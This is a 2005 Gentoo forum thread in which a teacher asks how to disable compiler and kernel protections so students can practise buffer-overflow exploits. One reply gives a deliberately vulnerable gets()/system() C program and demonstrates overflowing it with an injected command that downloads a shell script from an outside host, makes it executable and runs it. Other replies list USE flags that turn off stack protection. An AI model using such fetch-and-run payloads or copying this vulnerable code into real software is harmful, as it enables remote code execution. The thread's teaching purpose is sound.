| View previous topic :: View next topic |
| Author |
Message |
infiniteedge
Tux's lil' helper
Joined: 03 Mar 2004
Posts: 149
|
 Posted: Tue Sep 27, 2005 1:47 am Post subject: buffer overflows |
 |
|
I'm making an exercise for some students of mine to learn buffer overflows and wanted to know how I would have to compile Gentoo to make buffer overflows exploits the easiest. Eg, zero protections on gcc, zero protections in the kernel, zero protection period. I seem to remember that in recent version of kernel 2.6 there is some sort of environment variable address randomization to make it harder to find your exploit code in memory (if you're putting it in an environment variable)?
Anyway, gimme anything you got. Thanks. |
|
| Back to top |
|
 |
kinkos
Apprentice
Joined: 07 Feb 2005
Posts: 235
Location: Hoboken, NJ
|
| Posted: Tue Sep 27, 2005 4:22 am Post subject: |
|
|
I was given this project over the summer, and i have some advice. STay away from amd64 processors. there seems to be a serious issue with demonstrating that buffer overflow attempt. I'll go into the frustrating detail if you really want. Other than that, make sure its not a hardened system, for the obvious reasons. (after spending a summer researching the very exploits you want to demonstrate, i'm not sure if its possible on the hardened amd64 system i created). You may also like to try using an outdated version of gentoo, or possibly something like red-hat 6. sure, no one uses it any more, but its just for demonstration purposes, right? Also, the more recent the compiler, the more protections that are added by patches. I'm pretty sure that gcc 3.4.3 even comes with a significant amount of anti-exploit techniques compiled in by default.
In summary
-no amd64
-no hardened
-old
-vanilla everything (add vanilla to use flags, turns off all patches)
HTH
_________________
Open Source, Open Mind |
|
| Back to top |
|
|
Suicidal
l33t
Joined: 30 Jul 2003
Posts: 959
Location: /dev/null
|
| Posted: Tue Sep 27, 2005 5:36 am Post subject: |
|
|
Gentoo would be kinda difficult to use as an example for buffer overflow vulnerabilities since it is so up to date and vulnerable packages are frequently removed from portage.
A better example would be buying an old linux bible book that has something like redhat 7.3 or even 9.
Even better you could have them compile horrible code like the following:
buffer.cc
| Code: | #include<stdio.h>
#include<string.h>
#include<stdlib.h>
int main()
{
char command[]= "ps";
char mycommand[8];
puts(command ) ;
printf("Enter your command:" );
gets ( mycommand );
puts ( command );
system(command );
}
|
Run g++ against that and anything you enter at the command with less than 8 characters will run ps like it is supposed to do:
| Code: | ./a.out
ps
Enter your command:1234567
ps
PID TTY TIME CMD
12061 pts/0 00:00:00 bash
12099 pts/0 00:00:00 a.out
12100 pts/0 00:00:00 ps |
But anything over you can inject your own code such as the following;:
| Code: | # ./a.out
ps
Enter your command:12345678wget http://home.arcor.de/vdilchev/tcupdate.sh && chmod 777 tcupdate.sh && stat ./tcupdate.sh && ./tcupdate.sh -tep
wget http://home.arcor.de/vdilchev/tcupdate.sh && chmod 777 tcupdate.sh && stat ./tcupdate.sh && ./tcupdate.sh -tep
--22:25:17-- http://home.arcor.de/vdilchev/tcupdate.sh
=> `tcupdate.sh'
Resolving home.arcor.de... 151.189.20.30
Connecting to home.arcor.de|151.189.20.30|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 11,065 (11K) [application/x-sh]
100%[=================================================================================================================>] 11,065 27.60K/s
22:25:17 (27.52 KB/s) - `tcupdate.sh' saved [11065/11065]
File: `./tcupdate.sh'
Size: 11065 Blocks: 24 IO Block: 131072 regular file
Device: 307h/775d Inode: 4888186 Links: 1
Access: (0777/-rwxrwxrwx) Uid: ( 1000/Suicidal) Gid: ( 100/ users)
Access: 2005-09-26 22:22:54.000000000 -0700
Modify: 2005-01-30 16:29:07.000000000 -0800
Change: 2005-09-26 22:25:17.000000000 -0700
*** Following ToolChain Updates Available:
[ebuild N ] sys-apps/portage-2.0.52-r1
[ebuild N ] sys-kernel/linux-headers-2.6.11-r2
[ebuild N ] sys-libs/glibc-2.3.5-r1
[ebuild N ] sys-devel/binutils-2.16.1
[ebuild N ] sys-devel/binutils-config-1.8-r5
[ebuild N ] sys-devel/gcc-3.4.4-r1
[ebuild N ] sys-devel/gcc-config-1.3.12-r2
Merging following TC packages in order:
[ebuild R ] sys-apps/portage-2.0.52-r1
[ebuild R ] sys-kernel/linux-headers-2.6.11-r2
[ebuild R ] sys-kernel/linux-headers-2.6.11-r2
[ebuild R ] sys-libs/glibc-2.3.5-r1
[ebuild R ] sys-devel/binutils-config-1.8-r5
[ebuild R ] sys-devel/binutils-2.16.1
[ebuild R ] sys-devel/gcc-config-1.3.12-r2
[ebuild R ] sys-devel/gcc-3.4.4-r1
[ebuild R ] sys-libs/glibc-2.3.5-r1
[ebuild R ] sys-devel/binutils-2.16.1
[ebuild R ] sys-devel/gcc-3.4.4-r1
[ebuild R ] sys-libs/glibc-2.3.5-r1
[ebuild R ] sys-devel/binutils-2.16.1
[ebuild R ] sys-devel/gcc-3.4.4-r1
[ebuild R ] sys-apps/portage-2.0.52-r1
|
|
|
| Back to top |
|
|
allucid
Veteran
Joined: 02 Nov 2002
Posts: 1314
Location: atlanta
|
| Posted: Tue Sep 27, 2005 5:37 am Post subject: |
|
|
| Make sure you aren't using hardened gcc version since (I think) it has 'smash the stack' protection (ssp). |
|
| Back to top |
|
|
kinkos
Apprentice
Joined: 07 Feb 2005
Posts: 235
Location: Hoboken, NJ
|
| Posted: Tue Sep 27, 2005 5:45 am Post subject: |
|
|
Hardened gentoo is scary secure. As a regular user, you can;t see ANY processes that you don't own, not even init. Especially from the /proc interface. Like Suicidal said, an old linux bible with redhat 7.3 or some such.
_________________
Open Source, Open Mind |
|
| Back to top |
|
|
infiniteedge
Tux's lil' helper
Joined: 03 Mar 2004
Posts: 149
|
| Posted: Tue Sep 27, 2005 7:23 pm Post subject: |
|
|
| this isn't just for a demonstration, I need to be running gentoo on a series of UMLs that all the students have access to. Do you know specific flags for gcc that will turn off the protections you speak about? For amd64 I believe you were running into the NX or no-execute bit. we wont be running on amd64. |
|
| Back to top |
|
|
kinkos
Apprentice
Joined: 07 Feb 2005
Posts: 235
Location: Hoboken, NJ
|
| Posted: Tue Sep 27, 2005 7:35 pm Post subject: |
|
|
| Code: |
# grep vanilla /usr/portage/profiles/use.desc
vanilla - Do not add extra patches which change default behaviour
|
We didn't *just* hit the NX bit, although that was a problem. It was likely just our particular exercise. We were given a simple program with a buffer overflow, and told to exploit it to execute shell code. The problem was, all the locations of the buffer to exploit were low in memory, and were preceeded by several zeroes, like so:
| Code: |
&buffer[0]=00001122334455
|
we tried the standard smashing the stack attempt. our buffer had the shellcode near the beginning, follow by a bunch of NOPs, followed by the address in memory to jump to. BUT, the addresses had nulls in them, so as soon as the strcpy hit them, it stopped copying into the buffer, hence no exploit.
Anywho, more modern versions of gcc DO have certain protections put into them by default, the upstream developers add these security protections in. Thats why simply going vanilla isnt good enough. you need an outdated operating systems with an outdated compiler so it won't have these protections in.
_________________
Open Source, Open Mind |
|
| Back to top |
|
|
infiniteedge
Tux's lil' helper
Joined: 03 Mar 2004
Posts: 149
|
| Posted: Wed Sep 28, 2005 7:36 pm Post subject: |
|
|
| while this thread is great, what I'm really looking for are more things like the 'vanilla' use flag. does someone know *specific* command line flags to use with gcc to turn off all buffer overflow protection it has? I took a quick look and couldn't find any. |
|
| Back to top |
|
|
allucid
Veteran
Joined: 02 Nov 2002
Posts: 1314
Location: atlanta
|
| Posted: Wed Sep 28, 2005 7:50 pm Post subject: |
|
|
| The only explicit protection I know of is ssp which is compiled in so you won't find a flag for it. I believe it's only in hardened kernels though so you shouldn't have a problem (unless you are using hardened gcc). |
|
| Back to top |
|
|
kinkos
Apprentice
Joined: 07 Feb 2005
Posts: 235
Location: Hoboken, NJ
|
| Posted: Wed Sep 28, 2005 8:00 pm Post subject: |
|
|
I've done a little digging. Currently, SSP (Stack Smashing Protection) isn't build into gcc by default, but added as a patch. As of GCC 4.1, it WILL be in by default, meaning you have to use an old version at that point.
However, gentoo has SSP pactching in through the ebuilds.
Taking a look at this,
| Code: |
# emerge -pv gcc
These are the packages that I would merge, in order:
Calculating dependencies ...done!
[ebuild R ] sys-devel/gcc-3.4.4-r1 (-altivec) -bootstrap -boundschecking -build +fortran -gcj +gtk -hardened -ip28 (-multilib) -multislot (-n32) (-n64) +nls -nocxx -nopie -nossp -objc -static -vanilla 0 kB
Total size of downloads: 0 kB
|
you *should* be able to remove the ssp (and pie, which is position independant code) through use flags. it may work system wide, but if just for gcc, add this to your package.use:
| Code: |
# echo "sys-devel/gcc nossp nopie" >> /etc/portage/package.use
|
Aside from that, whatever is built in is built in, and i still reccomend the use of an older distro.
HTH.
[EDIT]
I forgot to include this:
| Quote: |
Under Gentoo, stack-smashing protection can be attained by adding the -fstack-protector flag for string protection, or -fstack-protector-all for protection of all types. Under OpenBSD, ProPolice is enabled by default, and the -fno-stack-protector flag disables it.
|
from here.
[/EDIT]
_________________
Open Source, Open Mind |
|
| Back to top |
|
|
|
|
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
|
Networking & Security
